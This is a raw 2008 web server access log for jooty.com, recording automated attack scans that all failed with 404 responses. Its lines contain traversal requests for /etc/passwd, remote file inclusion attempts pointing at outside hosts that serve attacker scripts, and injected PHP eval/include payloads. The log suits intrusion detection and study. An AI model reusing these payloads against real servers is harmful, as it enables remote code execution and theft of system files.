72.232.238.242 - - [11/Oct/2008:05:29:05 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:05 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:05 -0700] "GET /logs/access_080919.log//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:07 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:07 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:07 -0700] "GET /logs/access_080919.log//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:39 -0700] "GET /logs/access.log//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:39 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:39 -0700] "GET /login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:41 -0700] "GET /logs/access.log//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:41 -0700] "GET /login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
72.232.238.242 - - [11/Oct/2008:05:29:41 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
65.254.55.178 - - [11/Oct/2008:05:29:48 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
65.254.55.178 - - [11/Oct/2008:05:29:48 -0700] "GET /poll/poll_ssi.php?include_path=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
65.254.55.178 - - [11/Oct/2008:05:29:48 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:05:29:57 -0700] "GET /logs/access_080928.log%20/index.php?view=page&pagename=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
65.254.55.178 - - [11/Oct/2008:05:30:00 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:30:47 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:30:48 -0700] "GET /logs/access_080925.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:30:48 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:31:13 -0700] "GET /logs/access_080923.log///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://books.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
69.59.139.188 - - [11/Oct/2008:05:31:54 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.n0ne.moda-ok.com/ident.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
69.59.139.188 - - [11/Oct/2008:05:31:54 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.n0ne.moda-ok.com/ident.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
69.59.139.188 - - [11/Oct/2008:05:31:54 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.n0ne.moda-ok.com/ident.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:32:08 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:32:08 -0700] "GET /phphtml.php?htmlclass_path=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:32:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
212.62.97.20 - - [11/Oct/2008:05:32:36 -0700] "POST /vojew/zibevugo/dobooqu.cgi HTTP/1.1" 404 275 "http://www.jooty.com/lurout.cgi" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:32:52 -0700] "GET /logs/access_080929.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:32:52 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:32:53 -0700] "GET /logs/access_080929.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:32:53 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:33:03 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:33:03 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:33:07 -0700] "GET /logs/access.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "jooty.com"
203.194.205.6 - - [11/Oct/2008:05:33:09 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "jooty.com"
91.194.91.196 - - [11/Oct/2008:05:33:22 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:33:22 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:33:22 -0700] "GET /mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:33:23 -0700] "GET /mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:33:23 -0700] "GET /logs//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:33:23 -0700] "GET /logs//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:33:31 -0700] "GET /logs/access.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "jooty.com"
203.194.205.6 - - [11/Oct/2008:05:33:32 -0700] "GET /index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "jooty.com"
203.194.205.6 - - [11/Oct/2008:05:34:04 -0700] "GET /logs/access_080928.log//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:34:05 -0700] "GET /index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:34:06 -0700] "GET /logs//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:34:06 -0700] "GET /logs/access_080928.log//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:34:08 -0700] "GET /index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:34:09 -0700] "GET /logs//index.php?view=page&pagename=http://www.geocities.com/kalekek23/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
209.172.33.53 - - [11/Oct/2008:05:34:24 -0700] "GET /logs/access_080923.log//newspublish/include.php?path%5Bdocroot%5D=http://shelsy.net/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
209.172.33.53 - - [11/Oct/2008:05:34:28 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://shelsy.net/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
209.172.33.53 - - [11/Oct/2008:05:34:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://shelsy.net/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:34:42 -0700] "GET /logs/access_080826.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:34:43 -0700] "GET /logs/access_080826.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:34:52 -0700] "GET /logs/access_080925.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:34:53 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:34:54 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:35:19 -0700] "GET /logs/access_080926.log//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:05:35:20 -0700] "GET /logs/access_080926.log//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
209.172.33.53 - - [11/Oct/2008:05:36:08 -0700] "GET /logs/access_080924.log//newspublish/include.php?path%5Bdocroot%5D=http://shelsy.net/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:36:18 -0700] "GET /logs/access_080816.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:36:18 -0700] "GET /logs/access_080816.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
211.160.79.6 - - [11/Oct/2008:05:36:51 -0700] "GET /logs/access_080919.log//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
211.160.79.6 - - [11/Oct/2008:05:36:51 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
211.160.79.6 - - [11/Oct/2008:05:36:51 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
69.59.139.188 - - [11/Oct/2008:05:37:05 -0700] "GET /logs/access_080926.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.n0ne.moda-ok.com/ident.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.816" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:05:37:13 -0700] "GET /logs/access_080923.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:05:38:20 -0700] "GET /logs/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:05:38:21 -0700] "GET /logs/access.log/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:05:38:21 -0700] "GET /index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:38:31 -0700] "GET /logs/access_080914.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:38:31 -0700] "GET /logs/access_080914.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:38:31 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:38:31 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:38:32 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:38:32 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:05:38:40 -0700] "GET /logs/access_080928.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:38:52 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:38:52 -0700] "GET /index.php?DOCUMENT_ROOT=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:38:53 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
81.220.43.28 - - [11/Oct/2008:05:39:34 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://not-network.com/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
83.64.132.254 - - [11/Oct/2008:05:40:12 -0700] "GET /logs/access.log/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
83.64.132.254 - - [11/Oct/2008:05:40:12 -0700] "GET /index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
83.64.132.254 - - [11/Oct/2008:05:40:12 -0700] "GET /logs/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
211.160.79.6 - - [11/Oct/2008:05:40:23 -0700] "GET /login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
211.160.79.6 - - [11/Oct/2008:05:40:23 -0700] "GET /logs/access.log//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
211.160.79.6 - - [11/Oct/2008:05:40:23 -0700] "GET /logs//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:40:32 -0700] "GET /logs/access_080919.log//atom.php5?page=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:40:36 -0700] "GET /atom.php5?page=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
212.241.179.137 - - [11/Oct/2008:05:40:56 -0700] "GET /logs/access.log/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
212.241.179.137 - - [11/Oct/2008:05:40:56 -0700] "GET /logs/index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
212.241.179.137 - - [11/Oct/2008:05:40:57 -0700] "GET /index.php?body=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:41:00 -0700] "GET /logs//atom.php5?page=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:42:03 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:42:12 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.62.41.224 - - [11/Oct/2008:05:42:20 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://gabifir.ucoz.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
89.111.176.32 - - [11/Oct/2008:05:42:28 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
89.111.176.32 - - [11/Oct/2008:05:42:28 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
89.111.176.32 - - [11/Oct/2008:05:42:28 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:43:32 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:43:33 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
71.245.171.108 - - [11/Oct/2008:05:43:55 -0700] "GET /logs/access_080926.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.245.171.108 - - [11/Oct/2008:05:43:55 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.245.171.108 - - [11/Oct/2008:05:43:55 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
71.245.171.108 - - [11/Oct/2008:05:44:17 -0700] "GET /logs/access_080923.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:45:03 -0700] "GET /logs/access_080824.log//index.php?DOCUMENT_ROOT=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:45:09 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "jooty.com"
87.253.132.7 - - [11/Oct/2008:05:45:09 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "jooty.com"
87.253.132.7 - - [11/Oct/2008:05:45:33 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
87.253.132.7 - - [11/Oct/2008:05:45:34 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://antiemo.nl/community/system/cache/pictures/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:45:39 -0700] "GET /logs/access_080919.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:05:45:39 -0700] "GET /logs/access_080919.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
195.177.192.21 - - [11/Oct/2008:05:45:41 -0700] "GET /logs/access_080920.log/phphtml.php?htmlclass_path=http://vieira.us/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:45:52 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:45:53 -0700] "GET /logs/access_080928.log//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:45:53 -0700] "GET /mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:45:53 -0700] "GET /mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:45:53 -0700] "GET /logs//mwchat/libs/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
195.207.17.5 - - [11/Oct/2008:05:45:53 -0700] "GET /logs//mwchat/libs/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
203.194.205.6 - - [11/Oct/2008:05:46:00 -0700] "GET /logs/access_080928.log//index.php?view=page&pagename=http://not-network.com/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
